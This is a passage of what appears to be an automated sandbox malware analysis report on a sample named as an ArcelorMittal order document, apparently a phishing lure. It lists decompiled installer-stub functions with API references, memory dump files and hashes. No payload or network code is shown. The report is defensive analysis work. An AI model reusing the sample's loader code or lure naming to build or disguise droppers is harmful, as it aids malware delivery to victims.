                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CloseCreateHandleProcess
                                                              • String ID: Error launching installer
                                                              • API String ID: 3712363035-66219284
                                                              • Opcode ID: 3637be9cb8c8c178a0f5493f73af728e1da129e746f7561b800f2829df1c9c8b
                                                              • Instruction ID: 7a3daaf9c9c1dfce14d3e2680162b4324113c6786a0a66257257a350a584d1d9
                                                              • Opcode Fuzzy Hash: 3637be9cb8c8c178a0f5493f73af728e1da129e746f7561b800f2829df1c9c8b
                                                              • Instruction Fuzzy Hash: 67E046F4600209BFEB10AB60ED49F7B7BACEB44204F008420BE50F2190DAB8D8108A78
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 60%
                                                              			E00401FC3(void* __ebx, void* __eflags) {
                                                              				struct HINSTANCE__* _t23;
                                                              				struct HINSTANCE__* _t31;
                                                              				void* _t32;
                                                              				void* _t34;
                                                              				WCHAR* _t37;
                                                              				intOrPtr* _t38;
                                                              				void* _t39;
                                                              
                                                              				_t32 = __ebx;
                                                              				asm("sbb eax, 0x7a8af8");
                                                              				 *(_t39 - 4) = 1;
                                                              				if(__eflags < 0) {
                                                              					_push(0xffffffe7);
                                                              					L15:
                                                              					E00401423();
                                                              					L16:
                                                              					 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
                                                              					return 0;
                                                              				}
                                                              				_t37 = E00402BBF(0xfffffff0);
                                                              				 *((intOrPtr*)(_t39 - 8)) = E00402BBF(1);
                                                              				if( *((intOrPtr*)(_t39 - 0x1c)) == __ebx) {
                                                              					L3:
                                                              					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
                                                              					 *(_t39 + 8) = _t23;
                                                              					if(_t23 == _t32) {
                                                              						_push(0xfffffff6);
                                                              						goto L15;
                                                              					}
                                                              					L4:
                                                              					_t38 = E00406477( *(_t39 + 8),  *((intOrPtr*)(_t39 - 8)));
                                                              					if(_t38 == _t32) {
                                                              						E00405191(0xfffffff7,  *((intOrPtr*)(_t39 - 8)));
                                                              					} else {
                                                              						 *(_t39 - 4) = _t32;
                                                              						if( *((intOrPtr*)(_t39 - 0x24)) == _t32) {
                                                              							 *_t38( *((intOrPtr*)(_t39 - 0xc)), 0x400, _t34, 0x40cdcc, 0x40a000); // executed
                                                              						} else {
                                                              							E00401423( *((intOrPtr*)(_t39 - 0x24)));
                                                              							if( *_t38() != 0) {
                                                              								 *(_t39 - 4) = 1;
                                                              							}
                                                              						}
                                                              					}
                                                              					if( *((intOrPtr*)(_t39 - 0x20)) == _t32 && E0040381B( *(_t39 + 8)) != 0) {
                                                              						FreeLibrary( *(_t39 + 8)); // executed
                                                              					}
                                                              					goto L16;
                                                              				}
                                                              				_t31 = GetModuleHandleW(_t37); // executed
                                                              				 *(_t39 + 8) = _t31;
                                                              				if(_t31 != __ebx) {
                                                              					goto L4;
                                                              				}
                                                              				goto L3;
                                                              			}










                                                              0x00401fc3
                                                              0x00401fc3
                                                              0x00401fc8
                                                              0x00401fcf
                                                              0x0040208e
                                                              0x004021dc
                                                              0x004021dc
                                                              0x00402a4c
                                                              0x00402a4f
                                                              0x00402a5b
                                                              0x00402a5b
                                                              0x00401fde
                                                              0x00401fe8
                                                              0x00401feb
                                                              0x00401ffb
                                                              0x00401fff
                                                              0x00402007
                                                              0x0040200a
                                                              0x00402087
                                                              0x00000000
                                                              0x00402087
                                                              0x0040200c
                                                              0x00402017
                                                              0x0040201b
                                                              0x0040205b
                                                              0x0040201d
                                                              0x00402020
                                                              0x00402023
                                                              0x0040204f
                                                              0x00402025
                                                              0x00402028
                                                              0x00402031
                                                              0x00402033
                                                              0x00402033
                                                              0x00402031
                                                              0x00402023
                                                              0x00402063
                                                              0x0040207c
                                                              0x0040207c
                                                              0x00000000
                                                              0x00402063
                                                              0x00401fee
                                                              0x00401ff6
                                                              0x00401ff9
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                • Part of subcall function 00405191: lstrlenW.KERNEL32(007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000,?), ref: 004051C9
                                                                • Part of subcall function 00405191: lstrlenW.KERNEL32(00403168,007A0F20,00000000,007924F8,762E23A0,?,?,?,?,?,?,?,?,?,00403168,00000000), ref: 004051D9
                                                                • Part of subcall function 00405191: lstrcatW.KERNEL32(007A0F20,00403168), ref: 004051EC
                                                                • Part of subcall function 00405191: SetWindowTextW.USER32(007A0F20,007A0F20), ref: 004051FE
                                                                • Part of subcall function 00405191: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405224
                                                                • Part of subcall function 00405191: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523E
                                                                • Part of subcall function 00405191: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524C
                                                              • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                              • String ID:
                                                              • API String ID: 334405425-0
                                                              • Opcode ID: cb89a4fd28b95848d33a1bfc1764e9066b0be27e0c87ae0b066b9e15343262a0
                                                              • Instruction ID: f6a722eb4006bf24fd89555576c47c1226d97d21954259867b0b9a1495a6a6e6
                                                              • Opcode Fuzzy Hash: cb89a4fd28b95848d33a1bfc1764e9066b0be27e0c87ae0b066b9e15343262a0
                                                              • Instruction Fuzzy Hash: 6F219531900209EBCF20AFA5CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 86%
                                                              			E0040249E(int* __ebx, short* __esi) {
                                                              				void* _t7;
                                                              				int _t8;
                                                              				long _t11;
                                                              				int* _t14;
                                                              				void* _t18;
                                                              				short* _t20;
                                                              				void* _t22;
                                                              				void* _t25;
                                                              
                                                              				_t20 = __esi;
                                                              				_t14 = __ebx;
                                                              				_t7 = E00402CC9(_t25, 0x20019); // executed
                                                              				_t18 = _t7;
                                                              				_t8 = E00402BA2(3);
                                                              				 *__esi = __ebx;
                                                              				if(_t18 == __ebx) {
                                                              					L7:
                                                              					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                              				} else {
                                                              					 *(_t22 + 8) = 0x3ff;
                                                              					if( *((intOrPtr*)(_t22 - 0x1c)) == __ebx) {
                                                              						_t11 = RegEnumValueW(_t18, _t8, __esi, _t22 + 8, __ebx, __ebx, __ebx, __ebx);
                                                              						__eflags = _t11;
                                                              						if(_t11 != 0) {
                                                              							goto L7;
                                                              						} else {
                                                              							goto L4;
                                                              						}
                                                              					} else {
                                                              						RegEnumKeyW(_t18, _t8, __esi, 0x3ff);
                                                              						L4:
                                                              						_t20[0x3ff] = _t14;
                                                              						_push(_t18);
                                                              						RegCloseKey();
                                                              					}
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t22 - 4));
                                                              				return 0;
                                                              			}











                                                              0x0040249e
                                                              0x0040249e
                                                              0x004024a3
                                                              0x004024aa
                                                              0x004024ac
                                                              0x004024b3
                                                              0x004024b6
                                                              0x0040281e
                                                              0x0040281e
                                                              0x004024bc
                                                              0x004024c4
                                                              0x004024c7
                                                              0x004024e0
                                                              0x004024e6
                                                              0x004024e8
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004024c9
                                                              0x004024cd
                                                              0x004024ee
                                                              0x004024ee
                                                              0x004024f5
                                                              0x004024f6
                                                              0x004024f6
                                                              0x004024c7
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                                • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000160,00000000,00000022,00000000,?,?,?,0040232B,00000002), ref: 00402CF1
                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003,00020019), ref: 004024E0
                                                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nspD224.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Enum$CloseOpenValue
                                                              • String ID:
                                                              • API String ID: 167947723-0
                                                              • Opcode ID: 9265ab6f625e07d86975ae9e6924e5a372e872d8d6f540d845591db09282f072
                                                              • Instruction ID: b3b69fb6c0ab9d70611345d1cc2aadb4deec7d6fa7b8fc5cea9b38d3f519ee44
                                                              • Opcode Fuzzy Hash: 9265ab6f625e07d86975ae9e6924e5a372e872d8d6f540d845591db09282f072
                                                              • Instruction Fuzzy Hash: 38F08171A00204ABEB209FA5DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateFileA.KERNELBASE(00000000), ref: 10002963
                                                              • GetLastError.KERNEL32 ref: 10002A6A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorFileLast
                                                              • String ID:
                                                              • API String ID: 1214770103-0
                                                              • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                              • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                              • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                              • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 69%
                                                              			E00401389(signed int _a4) {
                                                              				intOrPtr* _t6;
                                                              				void* _t8;
                                                              				void* _t10;
                                                              				signed int _t11;
                                                              				void* _t12;
                                                              				signed int _t16;
                                                              				signed int _t17;
                                                              				void* _t18;
                                                              
                                                              				_t17 = _a4;
                                                              				while(_t17 >= 0) {
                                                              					_t6 = _t17 * 0x1c +  *0x7a8a70;
                                                              					if( *_t6 == 1) {
                                                              						break;
                                                              					}
                                                              					_push(_t6); // executed
                                                              					_t8 = E00401434(); // executed
                                                              					if(_t8 == 0x7fffffff) {
                                                              						return 0x7fffffff;
                                                              					}
                                                              					_t10 = E0040136D(_t8);
                                                              					if(_t10 != 0) {
                                                              						_t11 = _t10 - 1;
                                                              						_t16 = _t17;
                                                              						_t17 = _t11;
                                                              						_t12 = _t11 - _t16;
                                                              					} else {
                                                              						_t12 = _t10 + 1;
                                                              						_t17 = _t17 + 1;
                                                              					}
                                                              					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                              						 *0x7a7a2c =  *0x7a7a2c + _t12;
                                                              						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x7a7a2c, 0x7530,  *0x7a7a14), 0); // executed
                                                              					}
                                                              				}
                                                              				return 0;
                                                              			}











                                                              0x0040138a
                                                              0x004013fa
                                                              0x0040139b
                                                              0x004013a0
                                                              0x00000000
                                                              0x00000000
                                                              0x004013a2
                                                              0x004013a3
                                                              0x004013ad
                                                              0x00000000
                                                              0x00401404
                                                              0x004013b0
                                                              0x004013b7
                                                              0x004013bd
                                                              0x004013be
                                                              0x004013c0
                                                              0x004013c2
                                                              0x004013b9
                                                              0x004013b9
                                                              0x004013ba
                                                              0x004013ba
                                                              0x004013c9
                                                              0x004013cb
                                                              0x004013f4
                                                              0x004013f4
                                                              0x004013c9
                                                              0x00000000

                                                              APIs
                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                              • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 564535d36588263e3f9deefe94a200e845c26c7dee2e47344d25cef9fda2a614
                                                              • Instruction ID: 4d11fbcb8758acff49efb51301ce17a4c0d3f2729c831b224df7ca8d4f3fd522
                                                              • Opcode Fuzzy Hash: 564535d36588263e3f9deefe94a200e845c26c7dee2e47344d25cef9fda2a614
                                                              • Instruction Fuzzy Hash: 0D01F432624210ABE7095B389D04B6A3698E755314F10C53FF851F66F1DA78CC02DB4D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040231F(void* __ebx) {
                                                              				short* _t6;
                                                              				long _t8;
                                                              				void* _t11;
                                                              				void* _t15;
                                                              				long _t19;
                                                              				void* _t22;
                                                              				void* _t23;
                                                              
                                                              				_t15 = __ebx;
                                                              				_t26 =  *(_t23 - 0x1c) - __ebx;
                                                              				if( *(_t23 - 0x1c) != __ebx) {
                                                              					_t6 = E00402BBF(0x22);
                                                              					_t18 =  *(_t23 - 0x1c) & 0x00000002;
                                                              					__eflags =  *(_t23 - 0x1c) & 0x00000002;
                                                              					_t8 = E00402BFF(E00402CB4( *((intOrPtr*)(_t23 - 0x28))), _t6, _t18); // executed
                                                              					_t19 = _t8;
                                                              					goto L4;
                                                              				} else {
                                                              					_t11 = E00402CC9(_t26, 2); // executed
                                                              					_t22 = _t11;
                                                              					if(_t22 == __ebx) {
                                                              						L6:
                                                              						 *((intOrPtr*)(_t23 - 4)) = 1;
                                                              					} else {
                                                              						_t19 = RegDeleteValueW(_t22, E00402BBF(0x33));
                                                              						RegCloseKey(_t22);
                                                              						L4:
                                                              						if(_t19 != _t15) {
                                                              							goto L6;
                                                              						}
                                                              					}
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t23 - 4));
                                                              				return 0;
                                                              			}










                                                              0x0040231f
                                                              0x0040231f
                                                              0x00402322
                                                              0x00402351
                                                              0x00402359
                                                              0x00402359
                                                              0x00402367
                                                              0x0040236c
                                                              0x00000000
                                                              0x00402324
                                                              0x00402326
                                                              0x0040232b
                                                              0x0040232f
                                                              0x0040281e
                                                              0x0040281e
                                                              0x00402335
                                                              0x00402345
                                                              0x00402347
                                                              0x0040236e
                                                              0x00402370
                                                              0x00000000
                                                              0x00402376
                                                              0x00402370
                                                              0x0040232f
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                                • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000160,00000000,00000022,00000000,?,?,?,0040232B,00000002), ref: 00402CF1
                                                              • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 0040233E
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00402347
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CloseDeleteOpenValue
                                                              • String ID:
                                                              • API String ID: 849931509-0
                                                              • Opcode ID: 77460bd49ef5699d8326dfc913d723684c59f90a6791b38fbb55a59eac76fc56
                                                              • Instruction ID: 84b37c2a738164438e1dccf168bab5f9c0075825efa18c6fe23cdbeb1825a049
                                                              • Opcode Fuzzy Hash: 77460bd49ef5699d8326dfc913d723684c59f90a6791b38fbb55a59eac76fc56
                                                              • Instruction Fuzzy Hash: 03F04F72A04110ABEB11BFF59B4EABE7269AB80314F15803BF501B71D5D9FC99015629
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040156B(void* __ebx) {
                                                              				int _t4;
                                                              				void* _t9;
                                                              				struct HWND__* _t11;
                                                              				struct HWND__* _t12;
                                                              				void* _t16;
                                                              
                                                              				_t9 = __ebx;
                                                              				_t11 =  *0x7a7a10; // 0x0
                                                              				if(_t11 != __ebx) {
                                                              					ShowWindow(_t11,  *(_t16 - 0x28));
                                                              					_t4 =  *(_t16 - 0x2c);
                                                              				}
                                                              				_t12 =  *0x7a7a24; // 0x10442
                                                              				if(_t12 != _t9) {
                                                              					ShowWindow(_t12, _t4); // executed
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t16 - 4));
                                                              				return 0;
                                                              			}








                                                              0x0040156b
                                                              0x0040156b
                                                              0x00401579
                                                              0x0040157f
                                                              0x00401581
                                                              0x00401581
                                                              0x00401584
                                                              0x0040158c
                                                              0x00401594
                                                              0x00401594
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • ShowWindow.USER32(00000000,?), ref: 0040157F
                                                              • ShowWindow.USER32(00010442), ref: 00401594
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: 02f0ac1b67cb2627b76fb2ddbe3cc81ab2ed57dd30b63018c57652a54df5b954
                                                              • Instruction ID: ed417bde94489f19056025a1bce11d2b054895382ff63e29ca54f2f43ae8860f
                                                              • Opcode Fuzzy Hash: 02f0ac1b67cb2627b76fb2ddbe3cc81ab2ed57dd30b63018c57652a54df5b954
                                                              • Instruction Fuzzy Hash: AFE048727141049BCB14DBA8DD808AE77A6A784310714843BD502B3660C678DD10CF68
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00406408(signed int _a4) {
                                                              				struct HINSTANCE__* _t5;
                                                              				signed int _t10;
                                                              
                                                              				_t10 = _a4 << 3;
                                                              				_t8 =  *(_t10 + 0x40a400);
                                                              				_t5 = GetModuleHandleA( *(_t10 + 0x40a400));
                                                              				if(_t5 != 0) {
                                                              					L2:
                                                              					return GetProcAddress(_t5,  *(_t10 + 0x40a404));
                                                              				}
                                                              				_t5 = E0040639C(_t8); // executed
                                                              				if(_t5 == 0) {
                                                              					return 0;
                                                              				}
                                                              				goto L2;
                                                              			}





                                                              0x00406410
                                                              0x00406413
                                                              0x0040641a
                                                              0x00406422
                                                              0x0040642e
                                                              0x00000000
                                                              0x00406435
                                                              0x00406425
                                                              0x0040642c
                                                              0x00000000
                                                              0x0040643d
                                                              0x00000000

                                                              APIs
                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004032E9,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040641A
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406435
                                                                • Part of subcall function 0040639C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063B3
                                                                • Part of subcall function 0040639C: wsprintfW.USER32 ref: 004063EE
                                                                • Part of subcall function 0040639C: LoadLibraryW.KERNELBASE(?), ref: 004063FE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
